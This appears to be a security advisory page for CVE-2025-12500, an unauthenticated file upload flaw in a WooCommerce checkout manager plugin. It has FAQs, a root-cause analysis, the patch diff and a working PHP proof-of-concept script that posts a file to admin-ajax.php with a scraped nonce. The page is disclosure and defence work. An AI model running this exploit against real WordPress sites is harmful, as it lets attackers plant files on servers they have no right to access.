What is CVE-2025-12500?

CVE-2025-12500 is a medium severity vulnerability in the Checkout Field Manager for WooCommerce plugin, affecting versions up to 7.8.1. It allows unauthenticated attackers to upload files to the server due to insufficient authorization checks in the file upload functionality.

How does this vulnerability work?

The vulnerability is exploited by sending a POST request to the admin-ajax.php endpoint with the appropriate action parameter. Attackers can upload files by including a valid nonce, which can be obtained from the checkout page, allowing them to bypass authentication checks.

Who is affected by this vulnerability?

Any WordPress site using the Checkout Field Manager for WooCommerce plugin version 7.8.1 or earlier is affected. Administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

Log in to your WordPress admin dashboard, navigate to the ‘Plugins’ section, and locate the Checkout Field Manager for WooCommerce plugin. If the version is 7.8.1 or earlier, your site is vulnerable.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Checkout Field Manager for WooCommerce plugin to version 7.8.2 or later. Regularly check for updates to ensure all plugins are secure.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until a patch can be applied. Additionally, monitor server logs for any suspicious file uploads.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability can be exploited, it requires specific conditions to be met, such as unauthenticated access, making it a moderate risk.

What are the potential risks of exploitation?

Successful exploitation could allow attackers to upload arbitrary files, potentially leading to server resource exhaustion or hosting malicious content. This could facilitate further attacks or phishing campaigns.

How is the proof of concept structured?

The proof of concept outlines the steps to exploit the vulnerability, including obtaining a nonce and preparing a file upload. It illustrates how attackers can leverage the vulnerability to upload files without authentication.

What should I do if I suspect my site has been compromised?

If you suspect a compromise, immediately disable the affected plugin, review server logs for unauthorized uploads, and scan your site for malicious files. Consider restoring from a clean backup if necessary.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12500: Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.1 – Unauthenticated Limited File Upload (woocommerce-checkout-manager)

Q: What file types can be uploaded due to this vulnerability?

The vulnerability allows uploads of files that are limited to WordPress’s default allowed MIME types, which typically include images, documents, and archives. However, certain types like SVG or HTML files may pose additional risks.

CVE ID CVE-2025-12500

Plugin woocommerce-checkout-manager

Severity Medium (CVSS 5.3)

CWE 434

Vulnerable Version 7.8.1

Patched Version 7.8.2

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12500:
This vulnerability is an unauthenticated limited file upload flaw in the Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin. The issue affects all plugin versions up to and including 7.8.1. The vulnerability allows unauthenticated attackers to upload files to the server, though file types are limited to WordPress’s default allowed MIME types.

The root cause lies in the `ajax_checkout_attachment_upload` function within `/woocommerce-checkout-manager/lib/class-upload.php`. The vulnerable version lacked proper authorization checks. The function only verified a nonce via `check_admin_referer()` but did not validate whether the user was authenticated or had appropriate permissions. The `wp_ajax_nopriv_wooccm_order_attachment_update` hook in the constructor also allowed unauthenticated users to trigger file deletion. The `ajax_delete_attachment` function in `/woocommerce-checkout-manager/lib/controller/class-my-account.php` suffered from the same authorization deficiency.

Exploitation involves sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wooccm_checkout_attachment_upload`. Attackers must include a valid nonce, which can be obtained from the checkout page, and a file upload via the `wooccm_checkout_attachment_upload` parameter. The same endpoint with `action` set to `wooccm_order_attachment_update` or `wooccm_customer_attachment_update` allows unauthenticated file deletion. Attackers can upload files limited to WordPress’s default allowed MIME types, which typically include images, documents, and archives.

The patch introduces comprehensive authorization checks. The `ajax_checkout_attachment_upload` function now validates user authentication through two paths. For logged-in users, it checks `current_user_can(‘read’)`. For guest users, it verifies an active WooCommerce session and customer data. The patch removes the `wp_ajax_nopriv_wooccm_order_attachment_update` hook from the constructor. It also removes the `wp_ajax_nopriv_wooccm_customer_attachment_update` hook from the `class-my-account.php` file. The `ajax_delete_attachment` function now requires user authentication via `is_user_logged_in()`. The patch adds file upload limits through a new `max_files_per_upload` filter.

Successful exploitation allows attackers to upload arbitrary files to the server within WordPress’s allowed MIME type restrictions. This could lead to server resource exhaustion through disk space consumption. Attackers could host malicious content on the victim’s server. The vulnerability could facilitate phishing campaigns or serve as a foothold for further attacks. While file types are limited, certain allowed file types like SVG images or HTML documents could still pose security risks if improperly handled by other components.

Differential between vulnerable and patched code

Code Diff

--- a/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
@@ -14,7 +14,7 @@
     ),
     'wp-notice-plugin-promote' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-notice-plugin-promote',
-      'ver' => '1.1.7',
+      'ver' => '1.1.8',
     ),
     'wp-notice-plugin-required' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-notice-plugin-required',
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Load.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Load.php
@@ -407,7 +407,7 @@
 			$notice = array_merge(
 				$notice,
 				array(
-					'notice_more_label' => esc_html__( 'Get more info', 'wp-notice-plugin-promote' ),
+					'notice_more_label' => esc_html__( 'Learn more', 'wp-notice-plugin-promote' ),
 				)
 			);
 		}
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Traits/PluginActions.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Traits/PluginActions.php
@@ -40,7 +40,7 @@
 			return $this->plugin_install_label;
 		}

-		return esc_html__( 'Install', 'wp-notice-plugin-promote' );
+		return esc_html__( 'Install free', 'wp-notice-plugin-promote' );
 	}

 	/**
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/templates/notice.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/templates/notice.php
@@ -19,18 +19,33 @@
 			<img style="border-radius:5px;max-width: 90px;" src="<?php echo esc_url( $notice_logo ); ?>">
 		</div>
 		<div class="notice-content" style="margin-left: 15px;">
-			<p>
+			<?php
+			// Check if title contains block-level HTML tags
+			$has_block_tags = ! empty( $notice_title ) && preg_match( '/<(h[1-6]|div|p|ul|ol|li|blockquote|pre|table|form|section|article|header|footer|nav|aside)b/i', $notice_title );
+			?>
+			<?php if ( $has_block_tags ) : ?>
 				<?php if ( ! empty( $notice_title ) ) : ?>
 					<?php echo wp_kses_post( $notice_title ); ?>
-					<br/>
 				<?php endif; ?>
 				<?php if ( ! empty( $notice_description ) ) : ?>
-					<?php echo wp_kses_post( $notice_description ); ?>
+					<p>
+						<?php echo wp_kses_post( $notice_description ); ?>
+					</p>
 				<?php endif; ?>
-			</p>
+			<?php else : ?>
+				<p>
+					<?php if ( ! empty( $notice_title ) ) : ?>
+						<?php echo wp_kses_post( $notice_title ); ?>
+						<br/>
+					<?php endif; ?>
+					<?php if ( ! empty( $notice_description ) ) : ?>
+						<?php echo wp_kses_post( $notice_description ); ?>
+					<?php endif; ?>
+				</p>
+			<?php endif; ?>
 			<div style="display:flex;gap: 1em;align-items: center;" >
-				<a href="#" title="<?php echo esc_html__( 'I would not, close this alert.', 'wp-notice-plugin-promote' ); ?>" class="button-secondary link-dismiss" data-notice_index="<?php echo esc_attr( $notice_index ); ?>">
-					<?php echo esc_html__( 'I would not', 'wp-notice-plugin-promote' ); ?>
+				<a href="#" title="<?php echo esc_html__( 'Not interested, close this alert.', 'wp-notice-plugin-promote' ); ?>" class="button-secondary link-dismiss" data-notice_index="<?php echo esc_attr( $notice_index ); ?>">
+					<?php echo esc_html__( 'Not interested', 'wp-notice-plugin-promote' ); ?>
 				</a>
 				<?php
 				if ( ! empty( $notice_more_link ) && ! empty( $notice_more_label ) ) :
--- a/woocommerce-checkout-manager/lib/class-upload.php
+++ b/woocommerce-checkout-manager/lib/class-upload.php
@@ -11,7 +11,6 @@

 	public function __construct() {
 		add_action( 'wp_ajax_wooccm_order_attachment_update', array( $this, 'ajax_delete_attachment' ) );
-		add_action( 'wp_ajax_nopriv_wooccm_order_attachment_update', array( $this, 'ajax_delete_attachment' ) );

 		// Checkout
 		// -----------------------------------------------------------------------.
@@ -34,6 +33,20 @@
 			require_once ABSPATH . 'wp-admin/includes/image.php';
 		}

+		// Security Fix: CVE-2025-12500 - Add upload limits
+		$max_files_per_upload = apply_filters( 'wooccm_max_files_per_upload', 10 );
+		if ( count( $files['name'] ) > $max_files_per_upload ) {
+			wc_add_notice(
+				sprintf(
+					/* translators: %d: maximum number of files */
+					esc_html__( 'You can only upload a maximum of %d files at once.', 'woocommerce-checkout-manager' ),
+					$max_files_per_upload
+				),
+				'error'
+			);
+			return array();
+		}
+
 		$attachment_ids = array();

 		add_filter(
@@ -141,25 +154,63 @@
 	}

 	public function ajax_checkout_attachment_upload() {
-		if ( check_admin_referer( 'wooccm_upload', 'nonce' ) && isset( $_FILES['wooccm_checkout_attachment_upload'] ) ) {
+		// Security Fix: CVE-2025-12500 - Added proper authorization checks

-			// It cannot be wp_unslash becouse it has images paths
-			// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
-			$files = wc_clean( $_FILES['wooccm_checkout_attachment_upload'] );
+		// Step 1: Verify nonce for CSRF protection
+		if ( ! check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Security check failed.', 'woocommerce-checkout-manager' ) ) );
+		}

-			if ( empty( $files ) ) {
-				wc_add_notice( esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ), 'error' );
-				wp_send_json_error();
+		// Step 2: Verify files are present
+		if ( ! isset( $_FILES['wooccm_checkout_attachment_upload'] ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'No files provided.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		// Step 3: Authorization check - Allow if user is logged in OR has valid WooCommerce session
+		$current_user      = wp_get_current_user();
+		$is_user_logged_in = $current_user->ID > 0;
+
+		if ( $is_user_logged_in ) {
+			// For logged-in users, verify they have permission to make purchases
+			if ( ! current_user_can( 'read' ) ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'You do not have permission to upload files.', 'woocommerce-checkout-manager' ) ) );
+			}
+		} else {
+			// For guest users, verify they have an active WooCommerce session (checkout in progress)
+			if ( ! class_exists( 'WC' ) || ! WC()->session ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Session expired. Please refresh the page.', 'woocommerce-checkout-manager' ) ) );
 			}

-			$attachment_ids = $this->process_uploads( $files, 'wooccm_checkout_attachment_upload' );
+			// Verify WooCommerce session is initialized and valid
+			$session_handler = WC()->session;
+			if ( ! $session_handler || ! $session_handler->get_session_cookie() ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Invalid session. Please refresh the page.', 'woocommerce-checkout-manager' ) ) );
+			}

-			if ( count( $attachment_ids ) ) {
-				wp_send_json_success( $attachment_ids );
+			// Additional security: Check if customer data exists in session (indicates checkout process)
+			$customer = $session_handler->get( 'customer' );
+			if ( empty( $customer ) ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Please start checkout process before uploading files.', 'woocommerce-checkout-manager' ) ) );
 			}
-			wc_add_notice( esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ), 'error' );
-			wp_send_json_error();
 		}
+
+		// It cannot be wp_unslash becouse it has images paths
+		// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
+		$files = wc_clean( $_FILES['wooccm_checkout_attachment_upload'] );
+
+		if ( empty( $files ) ) {
+			wc_add_notice( esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ), 'error' );
+			wp_send_json_error( array( 'message' => esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		$attachment_ids = $this->process_uploads( $files, 'wooccm_checkout_attachment_upload' );
+
+		if ( count( $attachment_ids ) ) {
+			wp_send_json_success( $attachment_ids );
+		}
+
+		wc_add_notice( esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ), 'error' );
+		wp_send_json_error( array( 'message' => esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ) ) );
 	}

 	public function update_attachment_ids( $order_id = 0 ) {
--- a/woocommerce-checkout-manager/lib/controller/class-my-account.php
+++ b/woocommerce-checkout-manager/lib/controller/class-my-account.php
@@ -15,7 +15,8 @@
 		add_action( 'show_user_profile', array( $this, 'show_files_in_user_profile' ) );

 		add_action( 'wp_ajax_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );
-		add_action( 'wp_ajax_nopriv_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );
+		// Security Fix: CVE-2025-12500 - Removed nopriv hook to prevent unauthenticated file deletion
+		// add_action( 'wp_ajax_nopriv_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );

 		add_action(
 			'woocommerce_after_edit_address_form_billing',
@@ -30,30 +31,39 @@
 	}

 	public function ajax_delete_attachment() {
-		if ( ! empty( $_REQUEST ) && check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+		// Security Fix: CVE-2025-12500 - Added proper authorization checks

-			$array1 = explode( ',', sanitize_text_field( isset( $_REQUEST['all_attachments_ids'] ) ? wp_unslash( $_REQUEST['all_attachments_ids'] ) : '' ) );
-			$array2 = explode( ',', sanitize_text_field( isset( $_REQUEST['delete_attachments_ids'] ) ? wp_unslash( $_REQUEST['delete_attachments_ids'] ) : '' ) );
+		// Step 1: Verify nonce for CSRF protection
+		if ( ! check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Security check failed.', 'woocommerce-checkout-manager' ) ) );
+		}

-			if ( empty( $array1 ) || empty( $array2 ) ) {
-				wp_send_json_error( esc_html__( 'No attachment selected.', 'woocommerce-checkout-manager' ) );
-			}
+		// Step 2: Verify user is authenticated
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'You must be logged in to delete attachments.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		$array1 = explode( ',', sanitize_text_field( isset( $_REQUEST['all_attachments_ids'] ) ? wp_unslash( $_REQUEST['all_attachments_ids'] ) : '' ) );
+		$array2 = explode( ',', sanitize_text_field( isset( $_REQUEST['delete_attachments_ids'] ) ? wp_unslash( $_REQUEST['delete_attachments_ids'] ) : '' ) );
+
+		if ( empty( $array1 ) || empty( $array2 ) ) {
+			wp_send_json_error( esc_html__( 'No attachment selected.', 'woocommerce-checkout-manager' ) );
+		}

-			$attachment_ids = array_diff( $array1, $array2 );
-			if ( ! empty( $attachment_ids ) ) {
+		$attachment_ids = array_diff( $array1, $array2 );
+		if ( ! empty( $attachment_ids ) ) {

-				$user_id = get_current_user_id();
+			$user_id = get_current_user_id();

-				$customer_meta = get_user_meta( $user_id );
-				foreach ( $customer_meta as $key => $value ) {
-					if ( strpos( $key, 'wooccm' ) !== false ) {
-						if ( in_array( $value[0], $attachment_ids, true ) ) {
-							wp_delete_attachment( $value[0] );
-						}
+			$customer_meta = get_user_meta( $user_id );
+			foreach ( $customer_meta as $key => $value ) {
+				if ( strpos( $key, 'wooccm' ) !== false ) {
+					if ( in_array( $value[0], $attachment_ids, true ) ) {
+						wp_delete_attachment( $value[0] );
 					}
 				}
-				wp_send_json_success( 'Deleted successfully.', 'woocommerce-checkout-manager' );
 			}
+			wp_send_json_success( 'Deleted successfully.', 'woocommerce-checkout-manager' );
 		}
 	}

--- a/woocommerce-checkout-manager/vendor/composer/installed.php
+++ b/woocommerce-checkout-manager/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'quadlayers/woocommerce-checkout-manager',
-        'pretty_version' => 'v7.8.1',
-        'version' => '7.8.1.0',
-        'reference' => 'a4766a22590545cc2d993e244a508c1abc5d74d7',
+        'pretty_version' => 'v7.8.2',
+        'version' => '7.8.2.0',
+        'reference' => 'f5eb808cd79f07ecee49f0504a5e68c135536f4d',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -56,9 +56,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/woocommerce-checkout-manager' => array(
-            'pretty_version' => 'v7.8.1',
-            'version' => '7.8.1.0',
-            'reference' => 'a4766a22590545cc2d993e244a508c1abc5d74d7',
+            'pretty_version' => 'v7.8.2',
+            'version' => '7.8.2.0',
+            'reference' => 'f5eb808cd79f07ecee49f0504a5e68c135536f4d',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
@@ -74,9 +74,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/wp-notice-plugin-promote' => array(
-            'pretty_version' => '1.1.7',
-            'version' => '1.1.7.0',
-            'reference' => 'e947d41c606f1ab679518d87f2b51230a9d74c92',
+            'pretty_version' => '1.1.8',
+            'version' => '1.1.8.0',
+            'reference' => '21c4a760a999cddd7896eba5034b7c8163dba133',
             'type' => 'jetpack-library',
             'install_path' => __DIR__ . '/../../jetpack_vendor/quadlayers/wp-notice-plugin-promote',
             'aliases' => array(),
--- a/woocommerce-checkout-manager/vendor_packages/wp-notice-plugin-promote.php
+++ b/woocommerce-checkout-manager/vendor_packages/wp-notice-plugin-promote.php
@@ -20,20 +20,52 @@
 		/**
 		 * Notice cross sell 1
 		 */
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG', 'woocommerce-direct-checkout' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME', 'Direct Checkout' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION', esc_html__( 'Direct Checkout for WooCommerce allows you to reduce the steps in the checkout process by skipping the shopping cart page. This can encourage buyers to shop more and quickly. You will increase your sales reducing cart abandonment.', 'woocommerce-checkout-manager' ) );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_URL', 'https://quadlayers.com/products/woocommerce-direct-checkout/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=direct_checkout_link' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC', plugins_url( '/assets/backend/img/woocommerce-direct-checkout.jpg', WOOCCM_PLUGIN_FILE ) );
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG', 'wp-whatsapp-chat');
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME', 'Social Chat');
+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_1_TITLE',
+			wp_kses(
+				sprintf(
+					'<h3 style="margin:0">%s</h3>',
+					esc_html__('Turn more visitors into customers.', 'woocommerce-checkout-manager')
+				),
+				array(
+					'h3' => array(
+						'style' => array()
+					)
+				)
+			)
+		);

+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION',
+			esc_html__('Social Chat lets users contact you on WhatsApp with one click — faster support and higher conversions.', 'woocommerce-checkout-manager')
+		);
+
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_URL', 'https://quadlayers.com/products/whatsapp-chat/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=social_chat_link');
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC', plugins_url('/assets/backend/img/wp-whatsapp-chat.jpeg', WOOCCM_PLUGIN_FILE));
 		/**
 		 * Notice cross sell 2
 		 */
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG', 'perfect-woocommerce-brands' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME', 'Perfect WooCommerce Brands' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION', esc_html__( 'Perfect WooCommerce Brands the perfect tool to improve customer experience on your site. It allows you to highlight product brands and organize them in lists, dropdowns, thumbnails, and as a widget.', 'woocommerce-checkout-manager' ) );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_URL', 'https://quadlayers.com/products/perfect-woocommerce-brands/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=perfect_brands_link' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC', plugins_url( '/assets/backend/img/perfect-woocommerce-brands.jpg', WOOCCM_PLUGIN_FILE ) );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG', 'woocommerce-direct-checkout' );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME', 'Direct Checkout' );
+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_2_TITLE',
+			wp_kses(
+				sprintf(
+					'<h3 style="margin:0">%s</h3>',
+					esc_html__( 'Speed up your checkout process.', 'woocommerce-checkout-manager' )
+				),
+				array(
+					'h3' => array(
+						'style' => array()
+					)
+				)
+			)
+		);
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION', esc_html__( 'Reduce checkout steps by skipping the cart page. Faster purchases mean happier customers and fewer abandoned carts.', 'woocommerce-checkout-manager' ) );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_URL', 'https://quadlayers.com/products/woocommerce-direct-checkout/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=direct_checkout_link' );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC', plugins_url( '/assets/backend/img/woocommerce-direct-checkout.jpg', WOOCCM_PLUGIN_FILE ) );

 		new QuadLayersWP_Notice_Plugin_PromoteLoad(
 			WOOCCM_PLUGIN_FILE,
@@ -83,13 +115,7 @@
 					'plugin_slug'        => WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG,
 					'notice_delay'       => MONTH_IN_SECONDS * 3,
 					'notice_logo'        => WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC,
-					'notice_title'       => sprintf(
-						esc_html__(
-							'Hello! We want to invite you to try our %s plugin!',
-							'woocommerce-checkout-manager'
-						),
-						WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME
-					),
+					'notice_title'       => WOOCCM_PROMOTE_CROSS_INSTALL_1_TITLE,
 					'notice_description' => WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION,
 					'notice_more_link'   => WOOCCM_PROMOTE_CROSS_INSTALL_1_URL
 				),
@@ -97,13 +123,7 @@
 					'plugin_slug'        => WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG,
 					'notice_delay'       => MONTH_IN_SECONDS * 6,
 					'notice_logo'        => WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC,
-					'notice_title'       => sprintf(
-						esc_html__(
-							'Hello! We want to invite you to try our %s plugin!',
-							'woocommerce-checkout-manager'
-						),
-						WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME
-					),
+					'notice_title'       => WOOCCM_PROMOTE_CROSS_INSTALL_2_TITLE,
 					'notice_description' => WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION,
 					'notice_more_link'   => WOOCCM_PROMOTE_CROSS_INSTALL_2_URL
 				),
--- a/woocommerce-checkout-manager/woocommerce-checkout-manager.php
+++ b/woocommerce-checkout-manager/woocommerce-checkout-manager.php
@@ -4,7 +4,7 @@
  * Plugin Name:             WooCommerce Checkout Manager
  * Plugin URI:              https://quadlayers.com/products/woocommerce-checkout-manager/
  * Description:             Manage and customize WooCommerce Checkout fields (Add, Edit, Delete or re-order fields).
- * Version:                 7.8.1
+ * Version:                 7.8.2
  * Author:                  QuadLayers
  * Author URI:              https://quadlayers.com
  * License:                 GPLv3
@@ -25,7 +25,7 @@
  * Definition globals varibles
  */
 define( 'WOOCCM_PLUGIN_NAME', 'WooCommerce Checkout Manager' );
-define( 'WOOCCM_PLUGIN_VERSION', '7.8.1' );
+define( 'WOOCCM_PLUGIN_VERSION', '7.8.2' );
 define( 'WOOCCM_PLUGIN_FILE', __FILE__ );
 define( 'WOOCCM_PLUGIN_DIR', __DIR__ . DIRECTORY_SEPARATOR );
 define( 'WOOCCM_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12500 - Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.1 - Unauthenticated Limited File Upload

<?php

$target_url = "https://example.com/wp-admin/admin-ajax.php";

// Step 1: First, we need to obtain a valid nonce from the checkout page
// The nonce is typically available in the checkout page HTML
// This is a simplified example - in reality you'd need to scrape the page first
$nonce = "YOUR_VALID_NONCE_HERE"; // Replace with actual nonce from checkout page

// Step 2: Prepare the file upload
$file_path = "/path/to/test.jpg"; // Must be a WordPress-allowed file type
$file_name = "test.jpg";

// Step 3: Build the multipart form data
$boundary = "----WebKitFormBoundary" . md5(time());
$payload = "--" . $boundary . "rn";
$payload .= "Content-Disposition: form-data; name="action"rnrn";
$payload .= "wooccm_checkout_attachment_uploadrn";

$payload .= "--" . $boundary . "rn";
$payload .= "Content-Disposition: form-data; name="nonce"rnrn";
$payload .= $nonce . "rn";

$payload .= "--" . $boundary . "rn";
$payload .= "Content-Disposition: form-data; name="wooccm_checkout_attachment_upload"; filename="" . $file_name . ""rn";
$payload .= "Content-Type: image/jpegrnrn";
$payload .= file_get_contents($file_path) . "rn";
$payload .= "--" . $boundary . "--rn";

// Step 4: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    "Content-Type: multipart/form-data; boundary=" . $boundary,
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Analyze the response
if ($http_code == 200) {
    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success']) {
        echo "[+] File upload successful!n";
        echo "[+] Attachment IDs: " . print_r($response_data['data'], true) . "n";
    } else {
        echo "[-] Upload failed. Response: " . $response . "n";
    }
} else {
    echo "[-] HTTP Error: " . $http_code . "n";
}

// Note: This PoC requires a valid nonce from the checkout page
// The nonce can be obtained by scraping the checkout page HTML
// The vulnerability exists because the plugin doesn't verify user authentication,
// only the nonce which is publicly accessible on the checkout page

?>

Frequently Asked Questions

What is CVE-2025-12500?
Overview of the vulnerability
CVE-2025-12500 is a medium severity vulnerability in the Checkout Field Manager for WooCommerce plugin, affecting versions up to 7.8.1. It allows unauthenticated attackers to upload files to the server due to insufficient authorization checks in the file upload functionality.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability is exploited by sending a POST request to the admin-ajax.php endpoint with the appropriate action parameter. Attackers can upload files by including a valid nonce, which can be obtained from the checkout page, allowing them to bypass authentication checks.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Checkout Field Manager for WooCommerce plugin version 7.8.1 or earlier is affected. Administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps to verify plugin version
Log in to your WordPress admin dashboard, navigate to the ‘Plugins’ section, and locate the Checkout Field Manager for WooCommerce plugin. If the version is 7.8.1 or earlier, your site is vulnerable.
How can I fix this vulnerability?
Updating the affected plugin
To mitigate this vulnerability, update the Checkout Field Manager for WooCommerce plugin to version 7.8.2 or later. Regularly check for updates to ensure all plugins are secure.
What if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until a patch can be applied. Additionally, monitor server logs for any suspicious file uploads.
What does the CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability can be exploited, it requires specific conditions to be met, such as unauthenticated access, making it a moderate risk.
What are the potential risks of exploitation?
Consequences of a successful attack
Successful exploitation could allow attackers to upload arbitrary files, potentially leading to server resource exhaustion or hosting malicious content. This could facilitate further attacks or phishing campaigns.
How is the proof of concept structured?
Demonstrating the vulnerability
The proof of concept outlines the steps to exploit the vulnerability, including obtaining a nonce and preparing a file upload. It illustrates how attackers can leverage the vulnerability to upload files without authentication.
What file types can be uploaded due to this vulnerability?
Restrictions on uploaded files
